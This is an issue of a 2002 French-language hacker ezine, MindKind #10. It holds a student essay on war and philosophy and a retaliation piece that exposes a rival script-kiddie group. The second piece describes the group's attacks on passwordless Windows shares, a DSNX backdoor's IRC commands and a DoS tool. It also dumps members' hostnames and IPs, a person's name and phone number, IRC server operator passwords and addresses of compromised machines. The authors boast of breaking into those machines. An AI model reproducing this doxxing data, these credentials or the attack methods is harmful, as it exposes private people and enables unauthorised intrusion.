      ||   | | |     | dogbert == men va faire pepi == blanche-neige et les 7 g-string == 
      ||   | | |     | fille a pwal qui danse en face d'un screen saver 4bits unsigned ==
      ||   | | |     | optimus premier == chix-sandwich == homophobie 10baseA ==  
      ||     | |       chocolat en barre DRAM == chaman == jai un ULTRAsparc ==
      | \___/  |       export DISPLAY=a_sexy_chix_ass == MindFlayR == harrypotter == 42
      |        |       
       \______/        



                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Guerre et Philosophie, by Wyzeman                         / 10.17  /
'          aka: l'ecole au service de l'underground        .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


Cette article est en fait mon travail de fin de session de philo 1 au 
cegep, Je l'inclus dans ce ezine car il est en quelque sorte lier au 
evenement du 11 septembre 2001. Je tien a remercier Marie-Eve et 
Isabelle avec qui jai travailler pour produire ce text. Les habituers
remarquerons une certaine difference d'avec mon style personnelle. bien
que j'aille composer la majeur parti du text, le travail d'equipe impose
certaine contrainte, mais n'allez pas croire que se fut un fardeau. Nos
relation de "travail" etais fort sympatique.
space
Inventee au neolithique, epoque ou l'homme commenca a maitriser l'art de 
fabriquer et d'utiliser des outils, la guerre a ete concue et pratiquer 
pendant des millenaires. Nous voici a l'aube du 21eme siecle et deja nous 
somme impliquer dans une lutte fraticide. Une guerre entre deux nation 
aux ideologies differentes. La logique militaire nous propose plusieurs 
raisons de faire la guerre: principe religieux, pouvoir politique,
racisme et quete de ressources naturelles. Si nous observons ce phenomene
qu;est la guerre d'un angle philosophique et rationnel, pouvons nous dire
que ces principes sont fondes?
spaceAfin de mieux comprendre la relation entre la guerre et la philosophie, 
nous allons en premier lieu, clarifier ces deux concepts. La philosophie 
est le fruit qui nourrit la liberte. C'est d'agir et de reflechir 
conformement a sa raison, independamment de tout prejuges, craintes ou
preoccupations obsedantes. Le but principal de la philosophie est la 
recherche du bonheur, la pacification de l'existence et la preservation 
de la vie.
space
La guerre se definit par l'utilisation de moyens violents ayant pour but 
d'imposer ou defendre son point de vue. La guerre ne se limite pas qu'aux
affrontements entre deux ou plusieures etats. Elle represente aussi la 
multitude de luttes civiles visant a deposseder un gouvernement tyrannique
au profit de la democratie ou a tous conflits ethniques faisant fi des
frontieres plitiques etablies. La guerre est une action primitive, barbare
et simpliste de resoudre un probleme au lieu d'essayer d'arriver a une 
entente par les voies de la diplomatie et de la discussion.
space
la guerre entraine de nombreuses consequences generalement negatives. La 
vie humaine et sa qualite en sont lourdement atteintes. Les bombardements
detruisent le peu d'infrastructure des pays, car les guerres du 20eme 
siecle frappent habituellement les pays sous developpes. La destruction 
des institutions non militaires (hopitaux, ecoles, ...) entraine le mauvais
fonctionnement des societes. La guerre apporte en plus de tous les impacts
physiques, des consequences nefastes au niveau psychologique sur les 
populations civiles. Francois David exprime bien se fait dans l'articles
Bombardements americains en Afghanistan : ca suffit : "Nous avons peur,
nous haissons la guerre, nous craignons les actes vengeur des fanatiques 
[...] Nous nous sentons vulnerables et cherchons un sens a tout cela".
space
Pour limiter les consequences negatives sur les innocents, la plus part 
des pays a notre epoque on adhere a la convention de Geneve. Cette 
convention definit les droits des civils en territoire occupe, interdisant
le meurtre gratuit des femmes, enfants et toutes personnes non 
participantes au conflit ou etant dans l'impossibiliter de se defendre de
facon decente. Malheureusement, ces droits sont rarement respectes. Il
s'agit tout de meme d'une ouverture d'esprit au principe de la philosophie 
dans le monde de la guerre. Nous sommes cependant encore loin du but 
ultime depacification globale que recherche la philosophie. 
space
Il semble contradictoire que dans le monde d'aujourd'hui majoritairement
democratique dont les ideaux exprimes par M. Philipe Breton : "Une
tentative de pacifiaction des rapports humains par la communication" 
que nous ayons encore recours a la violence pour arriver a nos fin. Nous 
devons donc nous questionner si certaines raisons peuvent justifiees 
l'emploi des armes, Des raisons telles que la defense de la liberte ou
pour l'avenement de la democratie peuvent nous sembler juste, mais il ne
faut pas perdre de vue, comme nous le rappelle Ignacio Ramonet : "que
meme les meilleurs fins ne justifient pas tout les moyens. Les citoyens ont
tout a craindre d'une republique - laique ou religieuse - batie sur un bain
de sang". Il demeure dommage que nous devons en tant que societe libre et
democratique nous livrer encore au metier des armes affin de nous
preserver du chaos qui nous guette. Mais rappelons nous qu'en toutes 
circonstances, ce qui prime c'est la preservation de la vie humaine. Il est
paradoxal que la seul raison acceptable a la guerre soit la defense de la 
vie humaine. Comme disait Isaac Asimov : "la violence est le dernier
refuge de l'incompetence".
space
Eduquons chaque individu egalement. Respectons la liberte d'expression.
Utilisons l'argumentation comme arme de defense. Apprenons la rationalite 
de l'ame. Entraidons-nous
A tout les problemes, la guerre n'a jamais et ne sera jamais une solution.




 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | Wyzeman                             Wyzeman@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




         /-\    Tu va me donner canal shipshaw...
        |o-o|
         \+/
       +  |  +
        \-+-/
          |
          |             
        _/ \_

   Le MP3 fournit en annexe avec ce ezine vous est prsent par radio31337
                      -  LastCall_ et init_null -
                      
   Attendez vous  une autre mission un jour.. en attendant :
             http://mindkind.org:8787/radio31337mtl/
                                                               


                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Retalation on RectumCrew, by Ze Staff                     / 10.18  /
'          aka: le cancer dla prostate de l'ug Quebecois   .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


Une des spcialits de Mindkind est l'art du dernire minute. Nous excellons
dans le domaine. C'est pour ce que vous avez ces "News from the front", crit
 la fin du ezine, et contradictoire avec le disclaim. Et quoi c'est diffrent?
Et bien nous avons trouv nos souffres douleurs, et ce  la dernire minute.
Il ne s'agit pas de www.illmitch.com ni de www.angelfire.com/hiphop/audio/ mais
d'une gagne qui doivent leurs ressembler nomm Rectum Crew.

Ces gars la mrite par qu'ont parlent d'eux, mais bien qu'on les ridiculisent.
Ils sont drole oui, ils se croient, mais a la t trop loin. On peut bien
croire que Mafia Boy aille faite son toffe l'anne dernire, mais au moins y
venait pas coeurer les crews de warez pis les filles de 13-14 ans qui cruisent
sur #quebec. Yahoo pis eBay y'on l'argent pour se dfendre, les compagnies de
shellhosting qui fournissent des vhost l33t non. De plus la scne undergrounne
au QC est tellement minus qu'elle en ai fragile. Je dis pas qu'on dfend
sexygirl12 ou SKATEGURL13 mais taker down des shells locaux de nos affilier,
et faire un dos sur mindkind.org par le mme coup, on a pas aim.

Nous voici donc a 3 minutes du release fatidique. Wed Sep 11 22:57:48 2002

Et nous allons vous dvoiller rapidement ckon a pu trouver/faire sur ces
chers membres du rectum crew, en une semaine.

En premier on a commencer par dterminer avec quoi ils ont attaqu. Aprs
pas grand temps, on a dcouvert que ctais moyennement lame, mais que a
l'avait le mrite (le seul?) de marcher.

Ils avaient trouv des box en WinNT (genre 2000) qui avait pas de pass.
Donc ils pouvaient se connecter au share C$ et avec rexec.exe faire rouler
ce qu'ils veulent bien, et etc.

Ils sembleraient avoir a comme leet tool de scanning 
http://www.wab.com/NEWPASS/ ah pis tant qua faire :
(RectumCrew): description_programmes_offert.txt 0.60 kb
(RectumCrew): dsnx rectum crew.zip 159 kb
(RectumCrew): g-spot_bot_v2.0.txt 0.07 kb
(RectumCrew): g-spot_bot_v2.0.zip 446 kb
(RectumCrew): le script_que_j`utilise.txt 0.20 kb
(RectumCrew): legion_scan_netbios.zip 1.92 mb
(RectumCrew): mircsend.txt 0.67 kb
(RectumCrew): mircsend.zip 984 kb
(RectumCrew): mircsexe.txt 0.64 kb
(RectumCrew): mircsexe.zip 920 kb
(RectumCrew): mirctake.txt 0.25 kb
(RectumCrew): mirctake.zip 897 kb
(RectumCrew): superscan_scan_de_port.zip 239 kb
(RectumCrew): ul.dl.check.zip 181 kb
(RectumCrew): End of list.

De plus pour faire des DoS ils y ont t avec un TCL boboche qui
lance un ssping (JOLT1)  partir de la machine infecte.

En moyenne des bots (comme dcrit ci-haut ou ben juste pour flooder
sur IRC), y'en avaient de 20  70.

En plus de toute a (ouf) nous avons des informations sur leurs "backdoors"
faut dire que rectum crew c'est pas juste un lamer, c'est plusieurs.

Information sur le backdoor : Rectumcrew tant un groupe trs peu dvelopp
en notion de programmation, ils ont choisi d'utiliser une backdoor surnommer
DSNX, voici son fonctionnement :
Premirement lors de son excution, il se fait une copie de lui mme dans le
%SYSTEMROOT% et ajoute une clef dans la regedit qui lui permet de dmarrer
automatiquement. Plutot simple  dtecter!
vidamment tout se controle sur IRC.. avec ces commandes :
#z commande de dsinstalllation (sert a dsinstaller le backdoor)
#e "application.exe param1 param2  (sert  xecute n'importe quel application)
#r " commande de "RAW"        (ils se servaient de celle si pour flooder des chans)

Bon maintenant vous vous demandez, avec ces informations, quest-ce que Mindkind
a pu bien faire? Et bien on tait pas ass lame pour les flooder-back, donc ont
a pogn accs  la plupart (une majorit) des box qu'ils avaient, et on les a
patch. Rsultat : la fin des attaques DoS sur plusieurs shells, et autres flood
lame sur IRC.

Qui sont-ils?

Et bien ont a pas leurs noms, paske ils ont pas de vies. haha en vrit ils ont
investie bcp de temps a assayer de tout dtruire.. mais les voicis :

*** UnixGods is An|mal@Toronto-HSE-ppp3766093.sympatico.ca
*** UnixGods is -U-n-i-x- -I-s- -G-o-o-D-
*** UnixGods on *.undernet.org
*** UnixGods on #hehehehe, #punkmp3, #sexe69, #warezhq, #warez-central

cte twit la, y prend ttemps des nicks et des ident diffrents, pour pas se
faire reconnaitre. en voici des samples :

thegard is StylezdARk@Toronto-HSE-ppp3764002.sympatico.ca * thegard
thegard using *.undernet.org The Undernet Underworld
thegard End of /WHOIS list.
^Code^Man is stylezDArK@Toronto-HSE-ppp3764002.sympatico.ca * JiMmY
^Code^Man on #IsoWarez1b1 
^Code^Man using *.undernet.org The Undernet Underworld
^Code^Man End of /WHOIS list.
Playhard is StYlEzBeer@Toronto-HSE-ppp3763713.sympatico.ca * GoatWind
Playhard on #IsoWarez1b1 
Playhard using *.undernet.org The Undernet Underworld
Playhard End of /WHOIS list.


[[BLAZE]] is RaP@modemcable150.187-130-66.que.mc.videotron.ca * hiphop
[[BLAZE]] on @#UnderNet.Sucks.Hard #WAREZ-CENTRAL @#blaze #beauport @#mixmania @#13-15 #longzone +#15-18 
[[BLAZE]] using *.undernet.org The Undernet Underworld
[[blaze]] End of /WHOIS list.

lui par contre est plus pais et garde tjrs le mme nick.

vidamment si on regarde leurs serveurs IRC, on dcouvre quelque chose
d'intressent 
*** Looking up RectumCrew.ServeBeer.Com
*** Resolved RectumCrew.ServeBeer.Com to 65.94.235.173
*** Looking up 65.94.235.173
*** Resolved 65.94.235.173 to MTL-HSE-ppp203681.qc.sympatico.ca

qui tombe sur genre *** mmmnbvvc is ~mmmmm@MTL-HSE-ppp202904.qc.sympatico.ca
qui est un des grands rectums en chef.

Aux dernires nouvelles, #sexe69 c'est leur chan de bots.
[#sexe69] names- OwnWtf K|0wa AntDog BaLtHaZaR K3m|n3m None Antony S3duct|0n Calc {Samael}
L3ft cblac |Moon SlImE KuDoS Mackliko |Cerebrum Mcgyver thegard Drmatt Mobwoman \Nirvana\ 
Dr3ams Skull Dive @WeeDTiMe

pis tant qua tre explicit dans les pastes :
*** Sa|d is Oinlinux@adsl-207.134.0-229.globetrotter.net
*** OwnWtf is SeRiOuS@modemcable205.12-201-24.mtl.mc.videotron.ca
*** K|0wa is cHaRmInG@ts1-121.f1033.quebectel.com
*** AntDog is StYlEzBeer@HSE-MTL-ppp2075.qc.sympatico.ca
*** BaLtHaZaR is France@modemcable187.139-202-24.mtl.mc.videotron.ca
*** K3m|n3m is DogFire@203.167.89.75
*** None is sNoT@30-70.cableamos.com
*** Antony is TrOtSkY@ts1-115.f1434.quebectel.com
*** S3duct|0n is Arc|ng@d141-176-107.home.cgocable.net
*** Calc is usr154@81.22.128.230
*** {Samael} is ~Brave@modemcable251.119-202-24.mtl.mc.videotron.ca
*** L3ft is \Daisy\@modemcable121.143-203-24.que.mc.videotron.ca
*** cblac is Greek@193-153-213-171.uc.nombres.ttd.es
*** |Moon is Sydney@modemcable161.37-201-24.mtl.mc.videotron.ca
*** SlImE is ~KidFlare@Quebec-HSE-ppp3617830.sympatico.ca
*** KuDoS is usr151@81.22.128.230
*** Mackliko is ~Mcgyver@HSE-Ottawa-ppp326670.sympatico.ca
*** thegard is ~fr4nk@Toronto-HSE-ppp3763828.sympatico.ca
*** Mcgyver is Clark@modemcable062.130-201-24.mtl.mc.videotron.ca
*** Drmatt is ZakJesus@adsl-66.110.153-169.globetrotter.net
*** Mobwoman is ~Shockwave@HSE-Ottawa-ppp326670.sympatico.ca
*** \Nirvana\ is ~RatMajor@HSE-Ottawa-ppp326670.sympatico.ca
*** Dr3ams is Peace@modemcable167.255-202-24.mtl.mc.videotron.ca
*** WeeDTiMe is Homer@MTL-HSE-ppp203262.qc.sympatico.ca

Trompez-vous pas, ya des backdoor-bots dans le tas...!

Bon maintenant leurs servers IRC...
J'avoue que ya des rectums qu'on a pas russi a indentifier encore
*** darkwolf is BlacKWolF@modemcable008.186-201-24.mtl.mc.videotron.ca
*** darkwolf is Skate Script By Sk84EvEr
*** darkwolf on RectumCrew.ServeBeer.Com
*** darkwolf on @#rectumcrew
*** MICROKILL is CrAzY@RectumCrew.cjb.net-47136.18-203-24.mtl.mc.videotron.ca
*** MICROKILL is CrAZy-CrEW
*** MICROKILL on RectumCrew.ServeBeer.Com
*** MICROKILL is a Network Administrator on RectumCrew.cjb.net
*** MICROKILL is available for help.
*** MICROKILL on @#rectumcrew, @#therectumcrew

wow, eux qui sont tellement anti-ircop, y faut qui se fassent un ircd pour l'tre!
hehe

Ah tien, une petite info, WeeDTiMe reste en face du rectum en chef... ah bon.

Ah puis tant qua parler de leurs server IRC... regardon un peu des parties
intressente de la config :
M:TheRectumCrew.ServeIrc.Com:*:My IRC Network:6667
O:*@*:abc123:rectumcrw:rRDhgwlcYkKbBnNufoOAaNTCzHW^:10
A:My IRC Network:Admin [X]PaC:[X]PaC@serveirc.com
O:*.ipt.aol.com:mariee:lookgood:rRDhgwlcYkKbBnNufoOAaNTCzHW^:10
O:*.sympatico.ca:r00tm3:b00s:rRDhgwlcYkKbBnNufoOAaNTCzHW^:10
C:RectumCrew.ServeIrc.Com:rect42tum:RectumCrew.ServeIrc.Com::30
N:RectumCrew.ServeIrc.Com:rect42tum:RectumCrew

Hum.. de plus on dirait que ces gars la aime le tlphone.. y phreak pas, non on
la plus grande mthode qui ont utiliser doit tre le *71 ou *67 .. heh ou *69 haha

<RectumCrw> tu veux etre un employ du rectumcrew inc. ?
<RiK{OuT}> ouais jaimerais ca
<RectumCrw> je dois faire un nouvel appel tlphonique pour le site
<RectumCrw> tu sais ou jhabite 
<RiK{OuT}> nah jmen rappelle pu dave me lavais dit
<RectumCrw> dave qui ?
<RiK{OuT}> fournier
<RiK{OuT}> 514 570-2413 tu callera demain y dans mon char la

Va t-il avoir le temps de niaiser avec son cell? on sait pas.. :-)

M'enfin.. ya aussi des box qui ont t utiliser par la gagne..
147.46.178.204 et engineering.snu.ac.kr sont 2 pas pires 
ya aussi 195-23-15-170.nr.ip.pt www.kovia.fi et 213-84-171-78.adsl.xs4all.nl
et un paquet dautres qui rsolve pas...
64.8.3.194 63.83.137.195  202.102.239.188 195.7.60.162
etc etc..

Bon maintenant, comment on a faite pour tout savoir a? Et bien les chers
rectums se sont pas attaqu aux bonnes personnes.. yahoo pis ebay ont pas les
contacts qu'on a...

On a des logs .. Session Start: Thu Apr 25 23:45:39 2002
On a du monde qui sont infiltr depuis trs longtemps..

 RectumCrw (~fleur@MTL-HSE-ppp202348.qc.sympatico.ca) [Canada]
 ircname:  http://www.ircap.net !
 Oinks (~oinks@MTL-HSE-ppp201021.qc.sympatico.ca) [Canada]
 ircname: ANTI-RECTUM
 channels: @#4-5-0 @#fff
[17:13] @jasonx2 mojoe
[17:13] ButHudson jasonx2-Logged in (DSNX V0.4 Beta|1MB,0FB,0PR|00:09)
[17:13] \Alien\ jasonx2-Logged in (DSNX V0.4 Beta|1MB,0FB,0PR|00:07)
[17:13] Lazyg|rl jasonx2-Logged in (DSNX V0.4 Beta|1MB,0FB,0PR|00:03)
[17:13] {Jason} jasonx2-Logged in (DSNX V0.4 Beta|1MB,0FB,0PR|00:04)
[17:13] Gentle jasonx2-Logged in (DSNX V0.4 Beta|1MB,0FB,0PR|00:05)
[17:13] Mcduck jasonx2-Logged in (DSNX V0.4 Beta|1MB,0FB,0PR|00:08)
[17:13] Sydn3y jasonx2-Logged in (DSNX V0.4 Beta|1MB,0FB,0PR|17:37)
[17:13] Zedin jasonx2-Logged in (DSNX V0.4 Beta|1MB,0FB,0PR|00:07)

On aurait pu encore dvoiler tout plein d'infos comme on le fait depuis tantot,
mais malheureusement y rendu Wed Sep 11 23:40:34 2002, et on a un ezine a publi.

Vive la full disclosure, et la connaissance.....

On a jamais rien faite, car la gagne de rectums nous ont jamais touch, par
contre, cette semaine, ils ont un peu trop jouer aux terroristes avec nous.
(Nous ne veut pas dire mindkind directement, mais disons que NOUS ont a des 
amis.. et des bons contacts). On veut pas chercher la guerre aux terroristes,
non, mais les scripts kids qui s'en prennent aux plus forts qu'eux et qui
SURTOUT nous font perdre du temps.

C'est pas leet, les leets flood pas sur IRC, les leet install pas des floodbots
pour faire la grosse terreure sur #quebec, les leets vous bottes le cul.

URLs: http://membres.lycos.fr/rectumcrew/regle.html
      http://membres.lycos.fr/rectumcrew/

Mp3 disponibles  quelque part pour rire d'eux :
Bud-Rectum Waz Up.mp3
RectumCrew Inc. - RSA.mp3


 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | Ze Staff                           mindkind@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|





On espre que vous avez apprcier. Y'a pas de date de sortie pour le 
#11, mais disons dans un mois ou deux, ou quelque chose du genre ou
quelque chose de totalement diffrent. Dieu seul le sais, le seul 
problme c'est qu'il n'existe pas.











